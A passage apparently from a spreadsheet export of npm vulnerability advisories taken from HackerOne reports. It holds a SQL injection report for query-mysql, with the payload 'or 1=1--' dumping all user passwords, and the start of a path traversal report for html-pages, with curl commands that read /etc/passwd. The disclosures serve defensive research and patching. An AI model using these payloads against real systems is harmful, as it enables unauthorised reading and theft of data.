&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;configure&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="s1"&gt;&amp;#39;host&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;127.0.0.1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="s1"&gt;&amp;#39;user&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;root&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="s1"&gt;&amp;#39;password&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;root&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="s1"&gt;&amp;#39;database&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;test&amp;#39;&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;base&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;fetchById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;noob&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run application:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node app.js
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;result:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fetchById
success [ RowDataPacket { username: &amp;#39;noob&amp;#39;, password: &amp;#39;noob&amp;#39; } ]
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Now, modify query into following one:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// app.js&lt;/span&gt;
&lt;span class="c1"&gt;//... cut for readibility&lt;/span&gt;
&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;base&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;fetchById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;noob\&amp;#39; or 1=1-- &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run application again:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node app.js
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;this time result set contains all records from table &lt;code&gt;users&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fetchById
success [ RowDataPacket { username: &amp;#39;admin&amp;#39;, password: &amp;#39;admin&amp;#39; },
  RowDataPacket { username: &amp;#39;user&amp;#39;, password: &amp;#39;user&amp;#39; },
  RowDataPacket { username: &amp;#39;noob&amp;#39;, password: &amp;#39;noob&amp;#39; } ]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Other functions in &lt;code&gt;query-mysql&lt;/code&gt; module contains the same vulnerability. &lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;macOS 10.13.3&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3333.0 (Developer Build) (64-bit) &lt;/li&gt;
&lt;li&gt;Node.js version: v8.9.3&lt;/li&gt;
&lt;li&gt;npm version: 5.5.1&lt;/li&gt;
&lt;li&gt;mysql  Ver 14.14 Distrib 5.7.13, for osx10.11 (x86_64)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please feel free to invite module maintainer to this report. I haven&amp;#39;t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.&lt;/p&gt;
&lt;p&gt;I hope my report will help to keep Node.js ecosystem and its users safe in the future.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability allows malicious user to fetch/manipulate data in database&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-01T00:58:42.031Z</t>
  </si>
  <si>
    <t>2018-05-19T12:53:02.893Z</t>
  </si>
  <si>
    <t>This vulnerability allows malicious user to fetch/manipulate data in database</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  SQL Injection query mysql module. Due lack sanitization user input, attacker able craft SQL query data database.  Module  query mysql  Install module project dependency  https //www.npmjs.com/package/query mysql  version  0.0.2  Stats 0 downloads last day 13 downloads last week 85 downloads last month  ~1000 estimated downloads per year  Description  functions query mysql module used manipulate data build query usign simple string concatenation. leads SQL Injection vulnerability, attacker able pass own query run SQL database.  one functions, allows select record table depends value column  // node_modules/query mysql/lib/base.js, line 172     fetchById  function (table, id, name_id, callback) {         connect(function (connected) {             (connected) {                  connection.query(Â« Â»SELECT * Â« Â» + table + Â« Â» Â« Â» +name_id+Â« Â»="Â« Â»+ id+Â« Â»"Â« Â», function (err, rows, fields) {                     connection.end();                     console.log(Â« Â»fetchByIdÂ« Â»);                     //if (err) throw err;                     (err) {                         callback(Â« Â»errorÂ« Â», null);                     }else{                                               callback(Â« Â»successÂ« Â», rows);                     };                 })              }else{                 callback(Â« Â»error_connectionÂ« Â», null);             };         })     },  query itself simple string values passed user concatenated SQL  connection.query(Â« Â»SELECT * Â« Â» + table + Â« Â» Â« Â» +name_id+Â« Â»="Â« Â»+ id+Â« Â»"Â« Â»  assume, table, name_id id will passed as, respectively, users, id 1, following query  SELECT * users id="1"  returns record table users, id equals 1.  Now, pass id malicious query, 1 " 1=1      SELECT * users id="1" 1=1     query returns records table users  Mitigation  query mysql relies mysql module. module allows use Preparing Queries (Prepared Statements)   https //www.npmjs.com/package/mysql#preparing queries  use prepare query multiple insertion points, utilizing proper escaping ids values. simple example follows   var sql = Â« Â»SELECT * ?? ?? = ?Â« Â»; var inserts = ["users", "id", userId]; sql = mysql.format(sql, inserts);  Following valid, escaped query send database safely. useful looking prepare query actually sending database.   simplest avoid simple SQL Injection vulnerabilites.  Steps Reproduce    install query mysql module   $ npm install query mysql   log local MySQL instance create database test using following SQL      Table structure table `users`  DROP TABLE EXISTS `users`; /* 40101 SET [@saved_cs_client](/saved_cs_client)     = @@character_set_client */; /* 40101 SET character_set_client = utf8 */; CREATE TABLE `users` (   `username` varchar(50) DEFAULT NULL,   `password` varchar(50) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8;   populate data adding couple records   mysql  select * users; +          +          + | username | password | +          +          + | admin    | admin    | | user     | user     | | noob     | noob     | +          +          + 3 rows set (0.00 sec)   create sample application   // "use strict"  const query = require("query mysql")  query.configure({   "host"  "127.0.0.1",   "user"  "root",   "password"  "root",   "database"  "test" })  query.base.fetchById("users", "noob", "username", (msg, res) =  {   console.log(msg, res) })   run application   $ node   result   fetchById success [ RowDataPacket { username  "noob", password  "noob" } ]   Now, modify query following one   // //... cut readibility query.base.fetchById("users", "noob " 1=1   ", "username", (msg, res) =  {   console.log(msg, res) })   run application again   $ node   time result set contains records table users   fetchById success [ RowDataPacket { username  "admin", password  "admin" },   RowDataPacket { username  "user", password  "user" },   RowDataPacket { username  "noob", password  "noob" } ]  functions query mysql module contains vulnerability.   Supporting Material/References    macOS 10.13.3 Chromium 66.0.3333.0 (Developer Build) (64 bit)  version  v8.9.3 npm version  5.5.1 mysql  Ver 14.14 Distrib 5.7.13, osx10.11 (x86_64)   Please feel free invite module maintainer report. haven"t contacted maintainer want keep process fixing disclosing bug consistent HackerOne platform only.  hope report will help keep ecosystem its users safe future.  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability allows malicious user fetch/manipulate data database </t>
  </si>
  <si>
    <t>vulnerability allows malicious user fetch/manipulate data database</t>
  </si>
  <si>
    <t>[html-pages] Path Traversal in html-pages module allows to read any file from the server with curl</t>
  </si>
  <si>
    <t>/advisories/665</t>
  </si>
  <si>
    <t>2018-05-16T19:48:38.578+00:00</t>
  </si>
  <si>
    <t>html-pages</t>
  </si>
  <si>
    <t>https://www.npmjs.com/html-pages</t>
  </si>
  <si>
    <t>&lt;=2.0.9</t>
  </si>
  <si>
    <t>&gt;=2.1.0</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/306607.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi,&lt;/p&gt;
&lt;p&gt;This report is about Directory Traversal vulnerability I found in &lt;code&gt;html-pages&lt;/code&gt; module.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;html-pages is a module which allows to browse directories and  serve static files in the browser. The vulnerability exists in the latest available version (2.0.7)&lt;/p&gt;
&lt;p&gt;Link to npm page: &lt;a title="https://www.npmjs.com/package/html-pages" href="/redirect?signature=23b2378161b25b92b469828a25144ae7af166a35&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fhtml-pages" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/html-pages&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;When html-pages server is run, browser does not allow toread files from arbitrary locations. However, I&amp;#39;ve noticed that using simple bypasses with &lt;code&gt;%2e&lt;/code&gt; (.) or &lt;code&gt;%2f&lt;/code&gt; (/) I can easily go up in the directory tree. &lt;br&gt;
But it&amp;#39;s not possible to open any file in the browser, due to characters used in the path, only directory listing is available:&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/255/390/43cd49c7e5464062c145a59be3100d6c56374434/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIHCAZ7MS4QAAV24Q%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDLfDYYdXViQ0eaW2nyK3A4uJdDsSdEx%2FDp1RggrNoNMqZUfDOlFvP0TVBGUz4EaUMaL96YmlmVKXbtwS3xMEmLzQ6VIWTwvITAHWRRKx0IbhBl8hRW6hcmwHPLoFVuI79ktpZjOznLLOPAnAawSfJTULni3147sydOGX7ZjofEKrs5t6HGCovf2ru8Q5JUWqe6pq5tcmt6uFfSySdgRptsh2g372nVpoc7CztsEmWkJdktwKcWZbV5g8ooPFovVfOhv6K9JxxnGiEOjGs68mzNsPESmXSeNLGaoEAL7HEV7jtVIyDw2A5q8H4lC1w8Amq7GZWjjvVxkjJgVMGjsyk8ikVlq%2FlPq9a2BQ6bae%2Buey%2BijZ78pAC0eAfzQBJ%2F%2FChbHxoJA8OiB1lJc3cDCTucXl1jW7Fyq6%2FwBhzgvo0BjfDkhJHt%2Ff4KxGKe0bheLETxfl5ONnkWLWp%2FlBGyYhtU%2B%2Fqc%2FsxZ2dyYNkbRqRKn6LJvqxy5tEDnyklBfFbXo0PsZ2eevKo9aIcHIhO7L7fvJH5a1v8QpAgT%2FP37L0qsSWsIQsuXUXlm80EgJ8Ok2q6RouEwRb4xXvTwK2aUdrpVVcInhpSakogrrs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=ea69aaaf3288e10da1031e13d0ceb60b5a6159e869b4431fd3290cf4fb8d3aa6" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/255/390/43cd49c7e5464062c145a59be3100d6c56374434/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIHCAZ7MS4QAAV24Q%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDLfDYYdXViQ0eaW2nyK3A4uJdDsSdEx%2FDp1RggrNoNMqZUfDOlFvP0TVBGUz4EaUMaL96YmlmVKXbtwS3xMEmLzQ6VIWTwvITAHWRRKx0IbhBl8hRW6hcmwHPLoFVuI79ktpZjOznLLOPAnAawSfJTULni3147sydOGX7ZjofEKrs5t6HGCovf2ru8Q5JUWqe6pq5tcmt6uFfSySdgRptsh2g372nVpoc7CztsEmWkJdktwKcWZbV5g8ooPFovVfOhv6K9JxxnGiEOjGs68mzNsPESmXSeNLGaoEAL7HEV7jtVIyDw2A5q8H4lC1w8Amq7GZWjjvVxkjJgVMGjsyk8ikVlq%2FlPq9a2BQ6bae%2Buey%2BijZ78pAC0eAfzQBJ%2F%2FChbHxoJA8OiB1lJc3cDCTucXl1jW7Fyq6%2FwBhzgvo0BjfDkhJHt%2Ff4KxGKe0bheLETxfl5ONnkWLWp%2FlBGyYhtU%2B%2Fqc%2FsxZ2dyYNkbRqRKn6LJvqxy5tEDnyklBfFbXo0PsZ2eevKo9aIcHIhO7L7fvJH5a1v8QpAgT%2FP37L0qsSWsIQsuXUXlm80EgJ8Ok2q6RouEwRb4xXvTwK2aUdrpVVcInhpSakogrrs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=ea69aaaf3288e10da1031e13d0ceb60b5a6159e869b4431fd3290cf4fb8d3aa6" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;However, with simple &lt;code&gt;curl&lt;/code&gt; call we can read any file on the remote server where &lt;code&gt;html-pages&lt;/code&gt; runs:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://localhost:8000/../../../../../Users/bl4de/.vimrc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="2.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/255/392/495ee21e86fbd4cb5c162564dbb48efbb7f3137d/2.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIHCAZ7MS4QAAV24Q%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDLfDYYdXViQ0eaW2nyK3A4uJdDsSdEx%2FDp1RggrNoNMqZUfDOlFvP0TVBGUz4EaUMaL96YmlmVKXbtwS3xMEmLzQ6VIWTwvITAHWRRKx0IbhBl8hRW6hcmwHPLoFVuI79ktpZjOznLLOPAnAawSfJTULni3147sydOGX7ZjofEKrs5t6HGCovf2ru8Q5JUWqe6pq5tcmt6uFfSySdgRptsh2g372nVpoc7CztsEmWkJdktwKcWZbV5g8ooPFovVfOhv6K9JxxnGiEOjGs68mzNsPESmXSeNLGaoEAL7HEV7jtVIyDw2A5q8H4lC1w8Amq7GZWjjvVxkjJgVMGjsyk8ikVlq%2FlPq9a2BQ6bae%2Buey%2BijZ78pAC0eAfzQBJ%2F%2FChbHxoJA8OiB1lJc3cDCTucXl1jW7Fyq6%2FwBhzgvo0BjfDkhJHt%2Ff4KxGKe0bheLETxfl5ONnkWLWp%2FlBGyYhtU%2B%2Fqc%2FsxZ2dyYNkbRqRKn6LJvqxy5tEDnyklBfFbXo0PsZ2eevKo9aIcHIhO7L7fvJH5a1v8QpAgT%2FP37L0qsSWsIQsuXUXlm80EgJ8Ok2q6RouEwRb4xXvTwK2aUdrpVVcInhpSakogrrs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=e9bf1c023882eeeed44bb5488f22e18445a96a787f191def6424f1945d83a254" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/255/392/495ee21e86fbd4cb5c162564dbb48efbb7f3137d/2.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIHCAZ7MS4QAAV24Q%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDLfDYYdXViQ0eaW2nyK3A4uJdDsSdEx%2FDp1RggrNoNMqZUfDOlFvP0TVBGUz4EaUMaL96YmlmVKXbtwS3xMEmLzQ6VIWTwvITAHWRRKx0IbhBl8hRW6hcmwHPLoFVuI79ktpZjOznLLOPAnAawSfJTULni3147sydOGX7ZjofEKrs5t6HGCovf2ru8Q5JUWqe6pq5tcmt6uFfSySdgRptsh2g372nVpoc7CztsEmWkJdktwKcWZbV5g8ooPFovVfOhv6K9JxxnGiEOjGs68mzNsPESmXSeNLGaoEAL7HEV7jtVIyDw2A5q8H4lC1w8Amq7GZWjjvVxkjJgVMGjsyk8ikVlq%2FlPq9a2BQ6bae%2Buey%2BijZ78pAC0eAfzQBJ%2F%2FChbHxoJA8OiB1lJc3cDCTucXl1jW7Fyq6%2FwBhzgvo0BjfDkhJHt%2Ff4KxGKe0bheLETxfl5ONnkWLWp%2FlBGyYhtU%2B%2Fqc%2FsxZ2dyYNkbRqRKn6LJvqxy5tEDnyklBfFbXo0PsZ2eevKo9aIcHIhO7L7fvJH5a1v8QpAgT%2FP37L0qsSWsIQsuXUXlm80EgJ8Ok2q6RouEwRb4xXvTwK2aUdrpVVcInhpSakogrrs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=e9bf1c023882eeeed44bb5488f22e18445a96a787f191def6424f1945d83a254" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here is the part of the code, which read directory content, but does not validate against Directory Traversal in any way, which literally makes &lt;code&gt;root&lt;/code&gt; config setting useless:&lt;/p&gt;
&lt;p&gt;&lt;a title="https://github.com/danielcardoso/html-pages/blob/master/lib/server.js#L122" href="/redirect?signature=7f225a6e87abbcf36e4547be2563aad40bb1ada4&amp;amp;url=https%3A%2F%2Fgithub.com%2Fdanielcardoso%2Fhtml-pages%2Fblob%2Fmaster%2Flib%2Fserver.js%23L122" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/danielcardoso/html-pages/blob/master/lib/server.js#L122&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This vulnerability can be exploited regardless of some &lt;code&gt;html-pages&lt;/code&gt; configuration settings, like &lt;code&gt;root&lt;/code&gt;. All files on the server can be read by malicious user.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;html-pages&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install html-pages
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create simple application which uses &lt;code&gt;html-pages&lt;/code&gt; for serving static files from local server:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;pages&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;html-pages&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;pagesServer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;pages&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;__dirname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;8000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;directory-index&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;root&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;./&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;no-clipboard&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;ignore&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.git&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;node_modules&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run application:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node app.js
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;open the browser and go to &lt;code&gt;127.0.0.1:8000&lt;/code&gt; You should see all directories and files in the directory, where &lt;code&gt;app.js&lt;/code&gt; was run. Now, try to modify url into something like &lt;code&gt;127.0.0.1:8000/.%2e/.%2e/&lt;/code&gt; - now content of directory two levels up in the file tree should be displayed. Try to open any directory or file (if available) by clicking on its name.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You should notice that application actually hangs on. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;from the terminal, execute following command (please adjust numbers of ../ to your system):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:8000/../../../../../etc/passwd
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You should see the content of &lt;code&gt;/etc/passwd&lt;/code&gt; file:&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="3.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/255/391/dcd72150639a52155275cd88055744f074c68ef5/3.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIHCAZ7MS4QAAV24Q%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDLfDYYdXViQ0eaW2nyK3A4uJdDsSdEx%2FDp1RggrNoNMqZUfDOlFvP0TVBGUz4EaUMaL96YmlmVKXbtwS3xMEmLzQ6VIWTwvITAHWRRKx0IbhBl8hRW6hcmwHPLoFVuI79ktpZjOznLLOPAnAawSfJTULni3147sydOGX7ZjofEKrs5t6HGCovf2ru8Q5JUWqe6pq5tcmt6uFfSySdgRptsh2g372nVpoc7CztsEmWkJdktwKcWZbV5g8ooPFovVfOhv6K9JxxnGiEOjGs68mzNsPESmXSeNLGaoEAL7HEV7jtVIyDw2A5q8H4lC1w8Amq7GZWjjvVxkjJgVMGjsyk8ikVlq%2FlPq9a2BQ6bae%2Buey%2BijZ78pAC0eAfzQBJ%2F%2FChbHxoJA8OiB1lJc3cDCTucXl1jW7Fyq6%2FwBhzgvo0BjfDkhJHt%2Ff4KxGKe0bheLETxfl5ONnkWLWp%2FlBGyYhtU%2B%2Fqc%2FsxZ2dyYNkbRqRKn6LJvqxy5tEDnyklBfFbXo0PsZ2eevKo9aIcHIhO7L7fvJH5a1v8QpAgT%2FP37L0qsSWsIQsuXUXlm80EgJ8Ok2q6RouEwRb4xXvTwK2aUdrpVVcInhpSakogrrs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=9afa286056ae56cf4f29c02f0df13849c0f37adf0f66cde40afd216be1c9b00b" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/255/391/dcd72150639a52155275cd88055744f074c68ef5/3.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIHCAZ7MS4QAAV24Q%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDLfDYYdXViQ0eaW2nyK3A4uJdDsSdEx%2FDp1RggrNoNMqZUfDOlFvP0TVBGUz4EaUMaL96YmlmVKXbtwS3xMEmLzQ6VIWTwvITAHWRRKx0IbhBl8hRW6hcmwHPLoFVuI79ktpZjOznLLOPAnAawSfJTULni3147sydOGX7ZjofEKrs5t6HGCovf2ru8Q5JUWqe6pq5tcmt6uFfSySdgRptsh2g372nVpoc7CztsEmWkJdktwKcWZbV5g8ooPFovVfOhv6K9JxxnGiEOjGs68mzNsPESmXSeNLGaoEAL7HEV7jtVIyDw2A5q8H4lC1w8Amq7GZWjjvVxkjJgVMGjsyk8ikVlq%2FlPq9a2BQ6bae%2Buey%2BijZ78pAC0eAfzQBJ%2F%2FChbHxoJA8OiB1lJc3cDCTucXl1jW7Fyq6%2FwBhzgvo0BjfDkhJHt%2Ff4KxGKe0bheLETxfl5ONnkWLWp%2FlBGyYhtU%2B%2Fqc%2FsxZ2dyYNkbRqRKn6LJvqxy5tEDnyklBfFbXo0PsZ2eevKo9aIcHIhO7L7fvJH5a1v8QpAgT%2FP37L0qsSWsIQsuXUXlm80EgJ8Ok2q6RouEwRb4xXvTwK2aUdrpVVcInhpSakogrrs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=9afa286056ae56cf4f29c02f0df13849c0f37adf0f66cde40afd216be1c9b00b" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
